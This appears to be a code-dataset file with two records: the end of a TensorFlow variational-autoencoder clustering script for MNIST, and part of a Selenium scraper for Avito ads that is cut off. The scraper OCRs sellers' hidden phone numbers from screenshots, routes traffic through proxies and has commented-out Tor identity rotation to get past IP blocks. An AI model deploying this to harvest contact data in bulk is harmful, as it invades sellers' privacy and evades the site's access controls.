dtype=tf.float32))\n\ndef encoder(input_tensor):\n W_fc1 = _weight_variable('W_1', [784, 500])\n b_fc1 = _bias_variable('b_1', [500])\n W_fc2 = _weight_variable('W_2', [500, FLAGS.hidden_size * 2])\n b_fc2 = _bias_variable('b_2', [FLAGS.hidden_size * 2])\n x_attributes = tf.matmul(tf.nn.relu(tf.matmul(input_tensor, W_fc1) + b_fc1), W_fc2) + b_fc2\n mean_x = x_attributes[:, :FLAGS.hidden_size]\n logcov_x = x_attributes[:, FLAGS.hidden_size:]\n return mean_x, logcov_x\n\ndef decoder(mean=None, logcov=None, s=None):\n stddev = tf.sqrt(tf.exp(logcov))\n if s is None:\n epsilon = tf.random_normal([FLAGS.batch_size, FLAGS.hidden_size])\n input_sample = mean + epsilon * stddev\n else:\n epsilon = tf.random_normal([s, FLAGS.batch_size, FLAGS.hidden_size])\n # q_x = tf.exp(-0.5 * tf.reduce_sum(tf.square(epsilon), 2))\n input_sample = tf.expand_dims(mean, 0) + epsilon * tf.expand_dims(stddev, 0)\n input_sample = tf.reshape(input_sample, [-1, FLAGS.hidden_size])\n W_fc1 = _weight_variable('W_1', [FLAGS.hidden_size, 500])\n b_fc1 = _bias_variable('b_1', [500])\n W_fc2 = _weight_variable('W_2', [500, 784])\n b_fc2 = _bias_variable('b_2', [784])\n return tf.nn.sigmoid(tf.matmul(tf.nn.relu(tf.matmul(input_sample, W_fc1) + b_fc1), W_fc2) + b_fc2), input_sample, epsilon\n\ndef sample(qeta_mu, sigma_px):\n epsilon = tf.random_normal([FLAGS.T, int(FLAGS.batch_size / FLAGS.T), FLAGS.hidden_size])\n means = tf.expand_dims(tf.transpose(qeta_mu), 1)\n covs = tf.expand_dims(tf.transpose(sigma_px), 1)\n input_sample = tf.reshape(epsilon * covs + means, [-1, FLAGS.hidden_size])\n W_fc1 = _weight_variable('W_1', 
[FLAGS.hidden_size, 500])\n b_fc1 = _bias_variable('b_1', [500])\n W_fc2 = _weight_variable('W_2', [500, 784])\n b_fc2 = _bias_variable('b_2', [784])\n return tf.reshape(tf.nn.sigmoid(tf.matmul(tf.nn.relu(tf.matmul(input_sample, W_fc1) + b_fc1), W_fc2) + b_fc2), [FLAGS.T, int(FLAGS.batch_size / FLAGS.T), 784])\n\ndef get_reconstruction_cost(output_tensor, target_tensor, epsilon=1e-8):\n return tf.reduce_sum(-target_tensor * tf.log(output_tensor + epsilon) -\n (1.0 - target_tensor) * tf.log(1.0 - output_tensor + epsilon))\n\ndef kl_Beta(alpha, beta, alpha_0, beta_0):\n return tf.reduce_sum(tf.lgamma(alpha_0) + tf.lgamma(beta_0) - tf.lgamma(alpha_0+beta_0)\n + tf.lgamma(alpha + beta) - tf.lgamma(alpha) - tf.lgamma(beta)\n + (alpha - alpha_0) * tf.digamma(alpha) + (beta - beta_0) * tf.digamma(beta)\n - (alpha + beta - alpha_0 - beta_0) * tf.digamma(alpha + beta))\n\ndef get_qv_reg_loss(alpha, beta, alpha_0, beta_0):\n # get the q(v|Y) loss E_q log \\frac{q(v|alpha, beta)}{q(v|Y)}\n return kl_Beta(alpha, beta, alpha_0, beta_0)\n\ndef get_qeta_reg_loss(mu, sigma):\n # get the q(\\eta|Y) reg loss E_q log \\frac{q(\\eta|\\mu_0, \\sigma_0^2)}{q(\\eta | Y)}\n mu_0 = tf.zeros([FLAGS.hidden_size, 1]) #parameters of p(\\eta) ~ N(mu_0, sigma_0^2 I)\n sigma_0 = 100.0 # set a big variance so that the parameters will be learned from data\n return -0.5 * tf.reduce_sum(1 + 2 * tf.log(sigma / sigma_0)\n - tf.square(sigma) / tf.square(sigma_0)\n - tf.square(mu - mu_0) / tf.square(sigma_0))\n\ndef get_S_loss_hao(mean_x, logcov_x, qv_alpha, qv_beta, qeta_mu, qeta_sigma, sigma_px, epsilon = 1e-8):\n S1 = tf.digamma(qv_alpha) - tf.digamma(qv_alpha + qv_beta) \n S2 = tf.cumsum(tf.digamma(qv_beta) - tf.digamma(qv_alpha + qv_beta))\n\n mean_x_expand = tf.expand_dims(mean_x, 1)\n logcov_x_expand = tf.expand_dims(logcov_x, 1)\n qeta_mu_expand = tf.expand_dims(tf.transpose(qeta_mu), 0)\n qeta_sigma_expand = tf.expand_dims(tf.transpose(qeta_sigma), 0)\n sigma_px_expand = tf.expand_dims(tf.transpose(sigma_px), 0)\n S3 = 0.5 * tf.reduce_sum(1 + logcov_x_expand - 2 * tf.log(sigma_px_expand) \\\n - (tf.exp(logcov_x_expand) + tf.square(qeta_sigma_expand) \\\n + tf.square(mean_x_expand - qeta_mu_expand)) / tf.square(sigma_px_expand), 2)\n S = S3 + tf.concat(0, [S1, [0.0]]) + tf.concat(0, [[0.0], S2])\n # get the variational distribution q(z)\n S_max = tf.reduce_max(S, reduction_indices=1)\n S_whiten = S - tf.expand_dims(S_max, 1)\n qz = tf.exp(S_whiten) / tf.expand_dims(tf.reduce_sum(tf.exp(S_whiten), 1), 1)\n # Summarize the S loss\n # S_loss = -tf.reduce_sum(tf.log(tf.reduce_sum(tf.exp(S), 1)))\n S_loss = -tf.reduce_sum(S_max) - tf.reduce_sum(tf.log(tf.reduce_sum(tf.exp(S - tf.expand_dims(S_max, 1)), 1) + epsilon))\n return S_loss, qz, S\n\ndef gaussian_mixture_pdf(mu, sigma, x, pi):\n mu_expand = tf.reshape(tf.transpose(mu), [FLAGS.T, 1, 1, FLAGS.hidden_size])\n sigma_expand = tf.reshape(tf.transpose(sigma), [FLAGS.T, 1, 1, FLAGS.hidden_size])\n return tf.reduce_sum(1 / tf.sqrt(tf.reduce_prod(sigma_expand, 3)) \n * tf.exp(-0.5 * tf.reduce_sum(tf.square(x - mu_expand) / sigma_expand, 3)) * tf.reshape(pi, [-1, 1, 1]), 0)\n\ndef get_marginal_likelihood(yt, mean_yt, xt, s, alpha, beta, eta_mu, eta_sigma, eps, sigma_px, epsilon = 1e-8):\n yt_expand = tf.expand_dims(yt, 0)\n mean_yt = tf.reshape(mean_yt, [s, FLAGS.batch_size, 784])\n xt = tf.reshape(xt, [1, s, FLAGS.batch_size, FLAGS.hidden_size])\n # p_ygivenx = tf.reduce_prod(tf.pow(mean_yt, yt_expand) * tf.pow(1 - mean_yt, 1 - yt_expand), axis=2)\n v = alpha / (alpha + 
beta)\n pi = tf.concat(0, [v, [1.0]]) * tf.concat(0, [[1.0], tf.cumprod(1 - v)])\n p_x = gaussian_mixture_pdf(eta_mu, tf.square(eta_sigma) + tf.square(sigma_px), xt, pi)\n log_p_y_s = tf.reduce_sum(yt_expand * tf.log(mean_yt + epsilon) \\\n + (1.0 - yt_expand) * tf.log(1.0 - mean_yt + epsilon), 2) \\\n + tf.log(p_x) \\\n + 0.5 * tf.reduce_sum(tf.square(eps), 2)\n log_p_y_s_max = tf.reduce_max(log_p_y_s, reduction_indices=0)\n log_p_y = tf.log(tf.reduce_mean(tf.exp(log_p_y_s - log_p_y_s_max), 0)) + log_p_y_s_max\n return tf.reduce_mean(log_p_y)\n\nif __name__ == \"__main__\":\n data_directory = os.path.join(FLAGS.working_directory, \"MNIST\")\n if not os.path.exists(data_directory):\n os.makedirs(data_directory)\n mnist = input_data.read_data_sets(data_directory, one_hot=False)\n train, val, test = mnist.train.images, mnist.validation.images, mnist.test.images \n train_labels, val_labels, test_labels = mnist.train.labels, mnist.validation.labels, mnist.test.labels\n mnist_train = make_dataset(train, train_labels)\n mnist_val = make_dataset(val, val_labels)\n mnist_test = make_dataset(test, test_labels)\n \n N = mnist_train.num_examples\n input_tensor = tf.placeholder(tf.float32, [FLAGS.batch_size, 28 * 28])\n\n with tf.variable_scope(\"encoder\") as scope:\n mean_x, logcov_x = encoder(input_tensor)\n with tf.variable_scope(\"decoder\") as scope:\n output_tensor, _, _ = decoder(mean_x, logcov_x)\n\n with tf.variable_scope(\"encoder\", reuse=True) as scope:\n mean_xt, logcov_xt = encoder(input_tensor)\n with tf.variable_scope(\"decoder\", reuse=True) as scope:\n mean_yt, xt, eps = decoder(mean_xt, logcov_xt, FLAGS.s)\n\n ''' edit by hao'''\n # first, get the reconstruction term E_q(X|Y) log p(Y|X)\n # which is the cross entory loss between output and input\n rec_loss = 1 / FLAGS.batch_size * get_reconstruction_cost(output_tensor, input_tensor)\n\n # second, get the q(v|Y) reg loss E_q log \\frac{q(v|alpha, beta)}{q(v|Y)}\n qv_alpha = tf.Variable((1 / (FLAGS.T - np.arange(1, FLAGS.T))).astype(np.float32), name = \"qv_alpha\") # vi parameters\n qv_beta = tf.Variable(tf.ones([FLAGS.T - 1]), name = \"qv_beta\") # vi parameters\n # alpha_0 = (1 / (FLAGS.T - np.arange(1, FLAGS.T))).astype(np.float32)\n alpha_0 = np.ones([FLAGS.T - 1]).astype(np.float32)\n beta_0 = 100 * np.ones([FLAGS.T - 1]).astype(np.float32)\n qv_reg_loss = 1 / FLAGS.batch_size * get_qv_reg_loss(qv_alpha, qv_beta, alpha_0, beta_0)\n\n # third, get the q(\\eta|Y) reg loss E_q log \\frac{q(\\eta|\\mu_0, \\sigma_0^2)}{q(\\eta | Y)}\n qeta_mu = tf.Variable(tf.random_uniform([FLAGS.hidden_size, FLAGS.T]), name = 'qeta_mu') # vi parameters \n qeta_sigma = tf.Variable(tf.random_uniform([FLAGS.hidden_size, FLAGS.T]), name = 'qeta_sigma') # vi parameters\n qeta_reg_loss = 1 / FLAGS.batch_size * get_qeta_reg_loss(qeta_mu, qeta_sigma)\n\n # forth, get the remained loss E_q log \\frac {p(z|v) p(x|z,y)} {q(z) q(x|y)}\n sigma_px = tf.Variable(tf.ones([FLAGS.hidden_size, FLAGS.T]), name = 'sigma_px', trainable=False)\n S_loss, qz, S = get_S_loss_hao(mean_x, logcov_x, qv_alpha, qv_beta, qeta_mu, qeta_sigma, sigma_px)\n S_loss = 1 / FLAGS.batch_size * S_loss \n regularizer = - tf.reduce_sum(tf.log(qz + 1e-8) * qz) / FLAGS.batch_size\n qz_all = tf.reduce_mean(qz, axis = 0)\n regularizer_all = tf.reduce_sum(tf.log(qz_all + 1e-8) * qz_all)\n '''END edit by hao'''\n\n with tf.variable_scope(\"decoder\", reuse=True) as scope:\n samples = sample(qeta_mu, sigma_px)\n\n vae_loss = rec_loss #+ tf.reduce_sum(0.5 * (tf.square(mean_x) + tf.exp(logcov_x) - 
logcov_x - 1.0)) / FLAGS.batch_size\n overall_loss = qv_reg_loss + qeta_reg_loss + rec_loss + S_loss + regularizer * 10 + regularizer_all * 100\n log_p_yt = get_marginal_likelihood(input_tensor, mean_yt, xt, FLAGS.s, qv_alpha, qv_beta, qeta_mu, qeta_sigma, eps, sigma_px)\n # Create optimizers\n encoder_trainables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='encoder')\n decoder_trainables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='decoder')\n updates_per_epoch = int(N / FLAGS.batch_size)\n\n # create the optimizer\n global_step = tf.Variable(0, trainable=False)\n #learning_rate = tf.train.exponential_decay(FLAGS.learning_rate, global_step, updates_per_epoch * 50, 1.0, staircase = True)\n optimizer = tf.train.AdamOptimizer(learning_rate = 0.0003, beta1 = 0.95, beta2 = 0.999, epsilon=1.0)\n pre_optimizer = tf.train.AdamOptimizer(learning_rate = 0.01, beta1 = 0.95, beta2 = 0.999, epsilon=1.0)\n pretraining_step = pre_optimizer.minimize(vae_loss, var_list = encoder_trainables + decoder_trainables)\n learning_step = optimizer.minimize(overall_loss, var_list = encoder_trainables + decoder_trainables + [qeta_mu, qeta_sigma, qv_alpha, qv_beta], global_step = global_step)\n\n #global_step_vi = tf.Variable(0, trainable=False)\n #learning_rate_vi = tf.train.exponential_decay(FLAGS.learning_rate, global_step_vi, updates_per_epoch * 50, 0.9, staircase = True)\n #optimizer_vi = tf.train.AdamOptimizer(learning_rate_vi, epsilon=1.0)\n #learning_step_vi = optimizer.minimize(overall_loss, var_list = [qv_alpha, qv_beta], global_step = global_step_vi)\n\n tf.summary.scalar('overall_loss', overall_loss)\n tf.summary.scalar('rec_loss', rec_loss)\n tf.summary.scalar('S_loss', S_loss)\n tf.summary.scalar('qv_reg_loss', qv_reg_loss)\n tf.summary.scalar('qeta_reg_loss', qeta_reg_loss)\n merged = tf.summary.merge_all()\n loader = tf.train.Saver(encoder_trainables + decoder_trainables + [qv_alpha, qv_beta, qeta_mu, qeta_sigma])\n \n save_dir = 'tb/dp_vae_mnist/' + FLAGS.logdir\n init = tf.initialize_all_variables()\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(save_dir, sess.graph)\n sess.run(init)\n\n print(\"Pretraining the dp-vae model\")\n for iii in range(100):\n ve_loss = 0.0\n mnist_train._index_in_epoch = 0\n for i in range(updates_per_epoch):\n x, _ = mnist_train.next_batch(FLAGS.batch_size)\n _, vae_loss_ = sess.run([pretraining_step, vae_loss], {input_tensor: x}) \n ve_loss += vae_loss_\n ve_loss /= updates_per_epoch\n print(\"Pretrain vae loss: %f\" % (ve_loss))\n if iii % 10 == 0:\n mnist_train._index_in_epoch = 0\n features = np.zeros([N, FLAGS.hidden_size])\n labels = np.zeros((N))\n for i in range(updates_per_epoch):\n x, y = mnist_train.next_batch(FLAGS.batch_size)\n [mean_x_] = sess.run([mean_x], {input_tensor: x})\n features[i * FLAGS.batch_size: (i + 1) * FLAGS.batch_size, :] = mean_x_\n labels[i * FLAGS.batch_size: (i + 1) * FLAGS.batch_size] = y\n\n model = BayesianGaussianMixture(n_components = FLAGS.T, max_iter = 300, covariance_type = 'diag', weight_concentration_prior=2)\n model.fit(features)\n preds = model.predict(features)\n print(\"------------> Fit a Bayesian GMM: acc: %f, nmi: %f\" % (cluster_acc(preds, labels), cluster_nmi(preds, labels)))\n\n # init other variational distributions\n assign_op = qeta_mu.assign(model.means_.T)\n sess.run(assign_op)\n # assign_op = sigma_px.assign(model.covariances_.T)\n # sess.run(assign_op)\n\n # init the encoder and decoder parameters\n #print(\"restore the encoder and decoder parameters\")\n 
#loader.restore(sess, \"trained/initialization.ckpt\")\n print(\"Training the dp-vae model\")\n best_train_rec, best_test_rec, best_val_rec = 999999, 9999999, 9999999\n best_val_heldout, best_test_heldout = 999999, 999999\n mnist_train._index_in_epoch = 0\n for epoch in range(FLAGS.max_epoch):\n # first, let train the encoder and decoder for a while:\n overall_loss_total, rec_loss_total, S_loss_total, qeta_reg_loss_total, qv_reg_loss_total = 0.0, 0.0, 0.0, 0.0, 0.0\n stats = np.zeros([FLAGS.T])\n for i in range(updates_per_epoch):\n x, _ = mnist_train.next_batch(FLAGS.batch_size)\n _, overall_loss_, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_, qz_, summary, step = sess.run([learning_step, overall_loss, rec_loss, S_loss, qeta_reg_loss, qv_reg_loss, qz, merged, global_step], {input_tensor: x}) \n overall_loss_total += overall_loss_ \n #print(\"epoch %d: iter %d, rec_loss: %f, S_loss: %f, qeta_loss: %f, qv_loss: %f\" % (epoch, i, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_))\n rec_loss_total += rec_loss_\n S_loss_total += S_loss_\n qeta_reg_loss_total += qeta_reg_loss_\n qv_reg_loss_total += qv_reg_loss_\n train_writer.add_summary(summary, step)\n assignment_ = np.zeros((FLAGS.batch_size, FLAGS.T)) \n assignment_[np.arange(FLAGS.batch_size), np.argmax(qz_, axis = 1)] = 1\n stats += np.sum(assignment_, axis = 0)\n overall_loss_total = overall_loss_total / updates_per_epoch \n rec_loss_total = rec_loss_total / updates_per_epoch\n S_loss_total = S_loss_total / updates_per_epoch\n qeta_reg_loss_total = qeta_reg_loss_total / updates_per_epoch\n qv_reg_loss_total = qv_reg_loss_total / updates_per_epoch\n if rec_loss_total <= best_train_rec:\n best_train_rec = rec_loss_total\n print(\"train ELBO: %f, rec_LL: %f, S_LL: %f, qeta_reg_LL: %f, qv_reg_LL: %f, epoch %d...\" \n % (-overall_loss_total, -rec_loss_total, -S_loss_total, -qeta_reg_loss_total, -qv_reg_loss_total, epoch))\n print(\"Assigments: \", stats)\n\n def eval_ELBO(dataset, name):\n dataset._index_in_epoch = 0\n num_iter = int(dataset.num_examples / FLAGS.batch_size)\n overall_loss_total, rec_loss_total, S_loss_total, qeta_reg_loss_total, qv_reg_loss_total, heldout_ll = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\n for i in range(num_iter):\n x, _ = dataset.next_batch(FLAGS.batch_size)\n overall_loss_, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_ , log_p_yt_\\\n\t\t\t\t\t\t\t\t\t\t = sess.run([overall_loss, rec_loss, S_loss, qeta_reg_loss, qv_reg_loss, log_p_yt], \\\n\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t{input_tensor: x}) \n overall_loss_total += overall_loss_ \n #print(\"epoch %d: iter %d, rec_loss: %f, S_loss: %f, qeta_loss: %f, qv_loss: %f\" % (epoch, i, rec_loss_, S_loss_, qeta_reg_loss_, qv_reg_loss_))\n rec_loss_total += rec_loss_\n S_loss_total += S_loss_\n qeta_reg_loss_total += qeta_reg_loss_\n qv_reg_loss_total += qv_reg_loss_\n heldout_ll += log_p_yt_\n overall_loss_total = overall_loss_total / num_iter \n rec_loss_total = rec_loss_total / num_iter\n S_loss_total = S_loss_total / num_iter\n qeta_reg_loss_total = qeta_reg_loss_total / num_iter\n qv_reg_loss_total = qv_reg_loss_total / num_iter\n heldout_ll = heldout_ll / num_iter\n print(\"%s ELBO: %f, rec_LL: %f, S_LL: %f, qeta_reg_LL: %f, qv_reg_LL: %f, heldout_nll: %f...\" \n % (name, -overall_loss_total, -rec_loss_total, -S_loss_total, -qeta_reg_loss_total, -qv_reg_loss_total, heldout_ll))\n return rec_loss_total, heldout_ll\n\n val_rec, val_heldout = eval_ELBO(mnist_val, 'val')\n test_rec, test_heldout = eval_ELBO(mnist_test, 'test')\n if val_rec < best_val_rec:\n best_val_rec = 
val_rec\n if test_rec < best_test_rec:\n best_test_rec = test_rec\n if -val_heldout < best_val_heldout:\n best_val_heldout = -val_heldout\n if -test_heldout < best_test_heldout:\n best_test_heldout = -test_heldout\n\n if epoch % 20 == 0:\n [imgs] = sess.run([samples])\n imgs_folder = os.path.join(save_dir, 'imgs', str(epoch))\n if not os.path.exists(imgs_folder):\n os.makedirs(imgs_folder)\n for k in range(FLAGS.T):\n for j in range(int(FLAGS.batch_size / FLAGS.T)):\n imsave(os.path.join(imgs_folder, '%d_%d.png') % (k, j), imgs[k][j].reshape(28, 28))\n #evaluate the marginal likelihood.\n print(\"best train rec %f, val rec %f, test rec %f..\" % (-best_train_rec, -best_val_rec, -best_test_rec))\n print(\"best val heldout-ll %f, test heldout-ll %f..\" % (-best_val_heldout, -best_test_heldout))\n loader.save(sess, train_writer.get_logdir() + '/final_model.ckpt')\n train_writer.close()\n","sub_path":"dp-vae-mnist.py","file_name":"dp-vae-mnist.py","file_ext":"py","file_size_in_byte":20309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"94978123","text":"import socks\r\nimport socket\r\nimport urllib.request\r\nfrom urllib.request import urlopen, Request\r\nimport re\r\nfrom lxml import html\r\nimport time\r\nimport csv\r\nfrom selenium import webdriver\r\nfrom PIL import Image\r\nfrom pytesseract import image_to_string\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nimport sys\r\nimport normalize_date\r\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\r\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\r\nimport os\r\nimport contextlib\r\nfrom selenium.webdriver.common.proxy import *\r\nimport urllib3\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nURLLIB PROXY\r\n\r\nproxy_support = urllib.request.ProxyHandler({'http' : '127.0.0.1:8118'})\r\nopener = urllib.request.build_opener(proxy_support)\r\nurllib.request.install_opener(opener)\r\n\"\"\"\r\n\r\n\"\"\"\r\nTOR CONNECTION\r\n\r\ndef send(s, string):\r\n print('>', string)\r\n s.send(bytes(string.encode('utf8')))\r\n s.send(b'\\n')\r\n data = recv(s)\r\n if not data.startswith('250 '):\r\n raise Exception()\r\n print(data)\r\n \r\ndef recv(s):\r\n return s.recv(1024).decode('utf8')\r\n\r\ndef create_connection(address, timeout=None, source_address=None):\r\n sock = socks.socksocket()\r\n sock.connect(address)\r\n return sock\r\n\r\n@contextlib.contextmanager\r\ndef connectTor():\r\n socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", 9050, True)\r\n old_socket = socket.socket\r\n old_connection = socket.create_connection\r\n socket.socket = socks.socksocket\r\n socket.create_connection = create_connection\r\n yield\r\n socket.socket = old_socket \r\n socket.create_connection = old_connection\r\n\r\ndef newIdentity(): \r\n raw_password = 'over' \r\n with socket.socket() as s:\r\n s.connect(('127.0.0.1', 9051))\r\n send(s, 'authenticate \"%s\"' % raw_password)\r\n send(s, 'setevents signal')\r\n send(s, 'signal newnym')\r\n\"\"\"\r\n\"\"\"\r\nEXCEPTIONS\r\n\"\"\"\r\nclass IPBlockedError(Exception):\r\n def __init__(self, text):\r\n self.txt = text\r\n\r\n\r\n\"\"\"\r\nPARSER\r\n\"\"\"\r\nclass AvitoParser(object):\r\n\r\n def __init__(self, proxy):\r\n self.page = \"\"\r\n self.proxy = proxy\r\n print('Proxy: ' + proxy)\r\n if proxy != 'no':\r\n proxy_support = urllib.request.ProxyHandler({'http' : proxy, 'https': proxy})\r\n opener = urllib.request.build_opener(proxy_support)\r\n urllib.request.install_opener(opener)\r\n fp = webdriver.FirefoxProfile(r'C:\\Users\\User\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\6ypz1xjt.default-release')\r\n binary = FirefoxBinary(r'C:\\Program Files\\Mozilla Firefox\\firefox.exe')\r\n self.driver = webdriver.Firefox(firefox_binary=binary, firefox_profile=fp)\r\n self.driver.delete_all_cookies()\r\n self.data = []\r\n self.data.append(['ID', 'Имя аккаунта', 'Название объявления', 'Дата', 'Адрес', 'Телефон', 'Очищенный телефон', 'URL'])\r\n\r\n def takeScreenshot(self):\r\n self.driver.save_screenshot('avito_screenshot.png')\r\n\r\n def telRecon(self):\r\n image = Image.open('tel.gif')\r\n tel_string = image_to_string(image)\r\n return tel_string\r\n\r\n def crop(self, location, size):\r\n image = Image.open('avito_screenshot.png')\r\n x = location['x']\r\n y = location['y']\r\n width = size['width']\r\n height = size['height']\r\n image.crop((x, y, x+width, 
y+height)).save('tel.gif')\r\n\r\n def readPage(self, url):\r\n #with connectTor():\r\n self.driver.get(url)\r\n print(\"URL: \" + str(url))\r\n fp = urllib.request.urlopen(url)\r\n mybytes = fp.read()\r\n html = mybytes.decode('utf8')\r\n self.page = html\r\n fp.close()\r\n \"\"\"\r\n #headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}\r\n http = urllib3.ProxyManager(\"http://\" + self.proxy)#127.0.0.1:8118\")\r\n req = http.request('GET', url, headers = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\"})\r\n #req = Request(url=url, headers=headers) \r\n html = req.read() \r\n html = html.decode('utf8')\r\n self.page = html\r\n \"\"\"\r\n\r\n def printPage(self):\r\n print(self.page)\r\n\r\n def getPages(self, url):\r\n self.readPage(url)\r\n tree = html.fromstring(self.page)\r\n pages = tree.xpath('//a[@class=\"pagination-page\"]/@href')\r\n last_page_num = ''\r\n try:\r\n last_page_num = int(pages[-1].split('?')[1].split('&')[0].split('=')[1])\r\n except IndexError:\r\n print('[ERR] IP temporarily blocked. Try again later.')\r\n sys.exit()\r\n print(\"[INF] Pages for scraping item URLs: \" + str(last_page_num))\r\n pages = []\r\n if '?q=' in url:\r\n for i in range(1, last_page_num+1):\r\n pages.append(url + '&p=' + str(i))\r\n else:\r\n for i in range(1, last_page_num+1):\r\n pages.append(url + '?p=' + str(i))\r\n items_pages = []\r\n try:\r\n for page in pages:\r\n items = []\r\n try:\r\n self.readPage(page)\r\n tree = html.fromstring(self.page)\r\n items = tree.xpath('//a[@class=\"snippet-link\"]/@href')\r\n except Exception as e:\r\n print('[ERR] Scraping failed: ' + str(e))\r\n continue \r\n for item in items:\r\n print('[INF] Item found: ' + item)\r\n items_pages.append('https://www.avito.ru' + item)\r\n time.sleep(2)\r\n except KeyboardInterrupt:\r\n print('[INF] Keyboard interrupted. Saving data.')\r\n return items_pages\r\n return items_pages\r\n\r\n def parseHtml(self, category):\r\n line = []\r\n firewall = None\r\n tree = html.fromstring(self.page)\r\n try:\r\n firewall = tree.xpath('//h2[@class=\"firewall-title\"]/text()')[0]\r\n if str(firewall) == 'Доступ с Вашего IP временно ограничен': \r\n raise IPBlockedError('IP Blocked. Closing app.')\r\n except IPBlockedError:\r\n raise IPBlockedError('IP Blocked 1. Closing app.')\r\n except Exception as e:\r\n #print('[INF] IP OK ' + str(e))\r\n print('')\r\n try:\r\n firewall = tree.xpath('//h1/text()')\r\n #print('fw: ' + str(firewall))\r\n # xpath returns a list, so compare its first element rather than str(list)\r\n if firewall and firewall[0].strip() == 'Доступ с вашего IP-адреса временно ограничен': # \"Access from your IP address is temporarily restricted\"\r\n raise IPBlockedError('IP Blocked 2. Closing app.')\r\n except IPBlockedError:\r\n raise IPBlockedError('IP Blocked. Closing app.')\r\n except Exception as e:\r\n print('[INF] IP OK ' + str(e))\r\n #ITEM ID\r\n item_id = '-'\r\n try:\r\n item_id = tree.xpath('//span[@data-marker=\"item-view/item-id\"]/text()')[0]\r\n if '№' in item_id:\r\n item_id = item_id.replace('№', '')\r\n item_id = item_id.strip()\r\n except Exception as e:\r\n item_id = '-'\r\n line.append(item_id)\r\n #ACC NAME\r\n name = '-'\r\n try:\r\n name = tree.xpath('//div[@class=\"seller-info-value\"]/div/a/text()')[0].split('\\n')[1].strip()\r\n except Exception:\r\n name = '-'\r\n line.append(name)\r\n #AD NAME\r\n ad = '-'\r\n try:\r\n ad = tree.xpath('//span[@class=\"title-info-title-text\"]/text()')[0].strip()\r\n except Exception:\r\n ad = '-'\r\n line.append(ad)\r\n #DATE\r\n date = '-'\r\n try:\r\n date = tree.xpath('//div[@class=\"title-info-metadata-item-redesign\"]/text()')[0].split('\\n')[1].strip().replace('\\xa0', ' ')\r\n date = normalize_date.normalize_date(date)\r\n except Exception as e:\r\n date = '-'\r\n line.append(date)\r\n #REGION\r\n region = '-'\r\n try:\r\n region = tree.xpath('//span[@class=\"item-address__string\"]/text()')[0].split('\\n')[1].strip()\r\n except Exception:\r\n region = '-'\r\n line.append(region)\r\n #TELEPHONE\r\n tel = '-'\r\n try:\r\n if category == 1:\r\n button = self.driver.find_element_by_xpath('//a[@class=\"button item-phone-button js-item-phone-button button-origin button-origin-blue button-origin_full-width button-origin_large-extra item-phone-button_hide-phone item-phone-button_card js-item-phone-button_card\"]')\r\n elif category == 2:\r\n #button = self.driver.find_element_by_xpath('//div[@class=\"js-item-phone-react\"]')\r\n button = WebDriverWait(self.driver, 3).until(EC.element_to_be_clickable((By.XPATH, '//div[@class=\"js-item-phone-react\"]')))\r\n button.click()\r\n time.sleep(5)\r\n self.takeScreenshot()\r\n if category == 1:\r\n image = self.driver.find_element_by_xpath('//div[@class=\"item-phone-big-number js-item-phone-big-number\"]/img')\r\n elif category == 2:\r\n image = self.driver.find_element_by_xpath('//img[@class=\"contacts-phone-3KtSI\"]')\r\n location = image.location\r\n size = image.size\r\n self.crop(location, size)\r\n tel = self.telRecon()\r\n tel = tel.strip() # str.strip() returns a new string, it does not modify in place\r\n counter_tel = 0\r\n while tel[0] != '8' and counter_tel < 5:\r\n print('[WRN] Screenshot failed. Waiting 5 seconds and trying again.')\r\n button.click()\r\n time.sleep(5)\r\n self.takeScreenshot()\r\n if category == 1:\r\n image = self.driver.find_element_by_xpath('//div[@class=\"item-phone-big-number js-item-phone-big-number\"]/img')\r\n elif category == 2:\r\n image = self.driver.find_element_by_xpath('//img[@class=\"contacts-phone-3KtSI\"]')\r\n location = image.location\r\n size = image.size\r\n self.crop(location, size)\r\n tel = self.telRecon()\r\n tel = tel.strip()\r\n counter_tel = counter_tel + 1\r\n if 'O' in tel:\r\n tel = tel.replace('O', '0')\r\n #CLEAN TEL\r\n clean_tel = tel\r\n if '-' in clean_tel:\r\n clean_tel = clean_tel.replace('-', '')\r\n if ' ' in clean_tel:\r\n clean_tel = clean_tel.replace(' ', '')\r\n if len(clean_tel) > 10:\r\n clean_tel = clean_tel[1:]\r\n if counter_tel >= 5:\r\n print('Tel recognition error: 5 attempts failed')\r\n tel = '-'\r\n clean_tel = '-'\r\n except Exception as e:\r\n print('Tel recognition error: ' + str(e))\r\n tel = '-'\r\n clean_tel = '-'\r\n line.append(tel)\r\n line.append(clean_tel)\r\n #URL is appended by the caller, hence the +1 in the length check below\r\n print(line)\r\n if len(line)+1 == len(self.data[0]):\r\n #self.data.append(line)\r\n return line\r\n else:\r\n print('Parse error. Scraped data != expected data.')\r\n\r\n def printTable(self):\r\n for line in self.data:\r\n print(line)\r\n\r\n def outputInCsv(self, outdir, save_descriptor):\r\n filename = outdir + '/avito_' + save_descriptor + '.csv'\r\n with open(filename, \"w\", newline=\"\", encoding='utf8') as file:\r\n writer = csv.writer(file, delimiter=';')\r\n writer.writerows(self.data)\r\n\r\n def updateCsv(self, outdir, save_descriptor):\r\n filename = outdir + '/avito_' + save_descriptor + '.csv'\r\n self.data.remove(['ID', 'Имя аккаунта', 'Название объявления', 'Дата', 'Адрес', 'Телефон', 'Очищенный телефон', 